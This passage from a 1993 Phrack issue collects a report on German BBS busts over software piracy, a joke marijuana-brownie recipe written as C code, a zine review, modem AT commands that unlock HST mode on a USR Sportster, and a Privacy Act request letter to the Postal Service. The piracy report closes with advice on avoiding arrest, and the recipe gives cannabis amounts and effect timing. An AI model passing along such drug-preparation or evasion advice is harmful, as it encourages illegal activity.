  850. had the most shocking experience in his life.  The cops came and
  851. took his BBS.
  852.  
  853. And more..
  854. Ego, co-sysop of a large German BBS, got busted.
  855. Andy/Spreadpoint (ex-sysop) got busted.
  856. And lots of others...
  857.  
  858. Unlike the US Secret Service, which delights in seizing all
  859. electronic equipment, like stereos, TVs, VCRs, the German cops
  860. were just after the computer hardware, especially the hard drives
  861. and file servers.
  862.  
  863. They usually come with three or four people.  All of the search warrants
  864. they were using were quite old, issued last December.
  865.  
  866. Who is behind those actions?
  867. First of all the BSA, Business Software Association.  They
  868. were also responsible for the recent raids of US Bulletin Boards.
  869. In Germany they just announced actions against piracy and
  870. bulletin boards.  The most active BSA Members are Microsoft and
  871. Lotus Development.  Microsoft, Lotus and the BSA are all located
  872. in Munich, Germany, home of German's most feared lawyer,
  873. Guenther Freiherr von Gravenreuth.  This guy has been fighting
  874. for years against piracy, young kids who copy games, and especially
  875. bulletin board systems.  He is also affiliated with Ariolasoft, a huge
  876. German distributor for game labels like Activision and others.
  877.  
  878. In the end, all I can say is:
  879. Be aware, don't get caught and don't keep illegal stuff on your board!
  880.  
  881.                   (c) 1993 SevenUp for Phrack
  882.  
  883. ******************************************************************************
  884.  
  885. Carlcory's brownies:
  886.  
  887. /* Begin cc_brownie.c */
  888.  
  889. Includes:
  890. #include "4_squares_baking_chocolate"
  891. #include "1_cup_butter"
  892. #include "2_cups_sugar"
  893. #include "4_eggs"
  894. #include "2_cups_flour"
  895. #include "2_tbs_vanilla"
  896. #include "1_third_cup_marijuana"        /*comment out if won't compile
  897.                                             on your system*/
  898. #include "1_cup_nuts"                   /*comment out if won't compile*/
  899.  
  900. void main(void);
  901.  
  902. {
  903.     heat(oven, 350);
  904.     add(butter, chocolate);
  905.     while(texture!='smooth')    {
  906.         stir(mixture);
  907.     }
  908.     Add(sugar);
  909.     add(eggs);
  910.     add(vanilla);
  911.     add(flour, pot);
  912.     add(nuts)
  913.     for(timer=0; timer<35; timer++) {
  914.         bake(mixture);
  915.     }
  916.     cool(hour);
  917. }
  918.  
  919.  
  920. /*The high takes about an hour to come on,
  921.  but lasts for 12 hrs. (4 brownies)
  922.  Make sure they cool (don't burn your mouth!)
  923.  and share with friends! */
  924.  
  925.  
  926. /*End of cc_brownie.c*/
  927.  
  928. ******************************************************************************
  929.  
  930. GRAY AREAS
  931. Examining the Gray Areas of Life
  932.  
  933. Gray Areas, Inc.
  934. P.O. Box 808
  935. Broomall, PA  19008-0808
  936. (215)353-8238
  937. grayarea@well.sf.ca.us
  938.  
  939.  
  940. Gray Areas is published quarterly and printed on recycled paper.  They also
  941. participate in local recycling efforts involving cans, glass, clothing,
  942. newspapers, and more.
  943.  
  944. A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US
  945. funds).  A 12-issue subscription costs $50.00 ($75.00 foreign).  You may
  946. purchase a twelve issue subscription and give 4 or 8 or those issues away as
  947. gifts to friends (i.e., the same 4 issues you receive would also go to 2 other
  948. recipients). Make check or money order out to Gray Areas, Inc.
  949.  
  950. STATEMENT OF PURPOSE:
  951.  
  952. Gray Areas exists to examine the gray areas of life.  We hope to unite people
  953. involved in all sorts of alternative lifestyles and deviant subcultures.  We
  954. are everywhere!  We felt that the government has done a great job of splitting
  955. people up so that we do not identify with other minority groups anymore.  There
  956. are so many causes now that we often do not talk to others not directly
  957. involved in our chosen causes.  We believe that the methods used to catch
  958. criminals are the same regardless of the crime and that much can be learned by
  959. studying how crimes in general are prosecuted and how people's morals are
  960. judged.  It is our mission to educate people so they begin to case more about
  961. the world around them. Please join our efforts by subscribing, advertising your
  962. business with us, and by spreading the word about what we're up to.
  963.  
  964. __________________________
  965.  
  966. Review by Knight Lightning:
  967.  
  968. I recently received a copy of the premier issue of Gray Areas, dated Fall 1992
  969. and with a cover price of $4.50 (US).  I was impressed with both the laser
  970. quality of the printing, artwork, and graphics, as well as the topics and
  971. content of the articles.
  972.  
  973. I would not characterize Gray Areas as a hacker magazine, but the subject did
  974. come up in an interview with John Perry Barlow (one of the original founders of
  975. the Electronic Frontier Foundation) where he discussed the EFF and its role in
  976. defending civil liberties.
  977.  
  978. No, instead I think it is safe to say that Gray Areas pays a lot of attention
  979. to the Grateful Dead.  Indeed the cover story is titled "Grateful Dead
  980. Unauthorized Videos."  Additionally, there are several other articles
  981. (including the John Barlow interview) that discuss varying aspects about the
  982. Dead's history, their politics, and of course their music.  An advertisement
  983. for the next issue of Gray Areas reveals that even more articles relating to
  984. the Grateful Dead are on the way; so if you are a "Dead Head" you will probably
  985. fall in love with this magazine!
  986.  
  987. However, the article that I appreciated most was "Zine Scene," a review of 163
  988. alternative newsletters that included such familiar names as 2600, Hack-Tic,
  989. Full Disclosure, and TAP; and others that I intend to take a look at like Iron
  990. Feather's Journal and bOING bOING.  The zines reviewed here covered every topic
  991. imaginable and I thought it was a great buffet for the mind to have such handy
  992. directory (especially since Factsheet Five went defunct about a year ago).
  993.  
  994. Other interesting articles had to do with video, audio, and software piracy and
  995. reviews of music and software.  I also enjoyed the great artwork found
  996. throughout the magazine in the form of visual aids, comics, and advertisements.
  997.  
  998. If you are a fan of alternative music or the Grateful Dead, you'll be very
  999. sorry if you don't subscribe immediately.  If you are interested in alternative
  1000. publications with more interesting points of view than Time or Newsweek then
  1001. you owe it to yourself to at least purchase a copy to check it out.
  1002.  
  1003. - - - - - - - - -
  1004.  
  1005. All letters sent to Gray Areas are presumed to be for publication unless you
  1006. specifically request that they omit your name or refrain from publishing your
  1007. comments.  If you are writing about something which could incriminate yourself,
  1008. they will protect your identity as a matter of policy.
  1009.  
  1010. ******************************************************************************
  1011.  
  1012.                 "Turning your USR Sportster w/ 4.1 roms
  1013.                     into a 16.8K HST Dual Standard"
  1014.  
  1015.                                    by
  1016.  
  1017.                       The Sausage with The Mallet
  1018.  
  1019.  
  1020. If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
  1021. the following commands to it to turn it into an HST 16.8K dual standard.
  1022. In effect, you add HST 16.8K to its V32.bis 14.4k capability.
  1023.  
  1024. ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
  1025. atgw03c6,22gw05cd,2f
  1026. ats14=1s24=150s26=1s32=8s34=0x7&w
  1027.  
  1028. A very important item is the b1, which tells the modem to use
  1029. the 16.8K HST protocol.  If you do not set b1, when the Sportster
  1030. connects with another V32 modem it will go through the CCITT v.32
  1031. connect tones and you will not get a 16.8K connect.
  1032.  
  1033. If you do get an HST connect, you will not hear the "normal"
  1034. train phase--instead you will hear the HST negotiation which
  1035. sounds like a 2400 baud carrier.
  1036.  
  1037. Finally, if you change the "cd" in the second line to a "cb", your
  1038. modem will think it is a V.32 Courier instead of an HST 16.8K.
  1039.  
  1040. Look for other pfine pfiles from Rancid Bacon Productions in conjunction
  1041. with USDA Grade A Hackers (UGAH.)  Accept no substitutes.
  1042.  
  1043. *******************************************************************************
  1044.  
  1045.    Request to Post Office on Selling of Personal Information
  1046.  
  1047.     In May 1992, the US Postal Service testified before the US House of
  1048.  Representatives' Government Operations Subcommittee that National Change of
  1049.  Address (NCOA) information filled out by each postal patron who moves and
  1050.  files that move with the Post Office to have their mail forwarded is sold to
  1051.  direct marketing firms without the person's consent and without informing
  1052.  them of the disclosure. These records are then used to target people who
  1053.  have recently moved and by private detective agencies to trace people, among
  1054.  other uses. There is no way, except by not filling out the NCOA form, to
  1055.  prevent this disclosure.
  1056.  
  1057.     This letter is to request information on why your personal information
  1058.  was disclosed  and what uses are being made of it. Patrons who send in this
  1059.  letter are encouraged to also forward it and any replies to their
  1060.  Congressional Representative and Senators.
  1061.  
  1062.  
  1063.  Eligible requestors: Anyone who has filed a change of address notice with
  1064.  the Postal Service within the last five years.
  1065.  
  1066.  
  1067.  
  1068.  Records Officer
  1069.  US Postal Service
  1070.  Washington, DC 20260                        PRIVACY ACT REQUEST
  1071.  
  1072.  
  1073.  Dear Sir/Madam:
  1074.  
  1075.    This is a request under the Privacy Act of 1974 (5 USC 552a). The Act
  1076.  requires the Postal Service, as a government agency, to maintain an
  1077.  accounting of the date, nature, and purpose of each disclosure of
  1078.  information about individuals. I request a copy of the accounting of all
  1079.  disclosures made of address change and mail forwarding information that I provided
  1080.  to the Postal Service. This information is maintained in USPS System of
  1081.  Records 010.010.
  1082.  
  1083.    On or about (date), I filed a change of address notice requesting that my
  1084.  mail be forwarded from (old address) to (new address). The name that I used
  1085.  on the change of address form was (name).
  1086.  
  1087.    This request includes the accounting of all disclosures made by the Postal
  1088.  Service, its contractors, and its licensees.
  1089.  
  1090.    I am making this request because I object to the Postal Service's policy of
  1091.  disclosing this information without giving individuals an option to prevent
  1092.  release of this information. I want to learn how my information has been
  1093.  disclosed and what uses have been made of it. Please let the Postmaster
  1094.  General know that postal patrons want to have a choice in how change of
  1095.  address information is used.
  1096.  
  1097.    If there is a fee in excess of $5 for this information, please notify me in
  1098.  advance. Thank you for consideration of this request.
  1099.  
  1100.  
  1101.  Sincerely,
  1102.  
  1103.  
  1104.  
  1105.  CC: Your Congressional Representative
  1106.      US House of Representatives
  1107.      Washington, DC 20510
  1108.  
  1109.      Your Senators
  1110.      US Senate
  1111.      Washington, DC 20515
  1112.  
  1113. -------------------------------------------------------------------------------
  1114.  
  1115.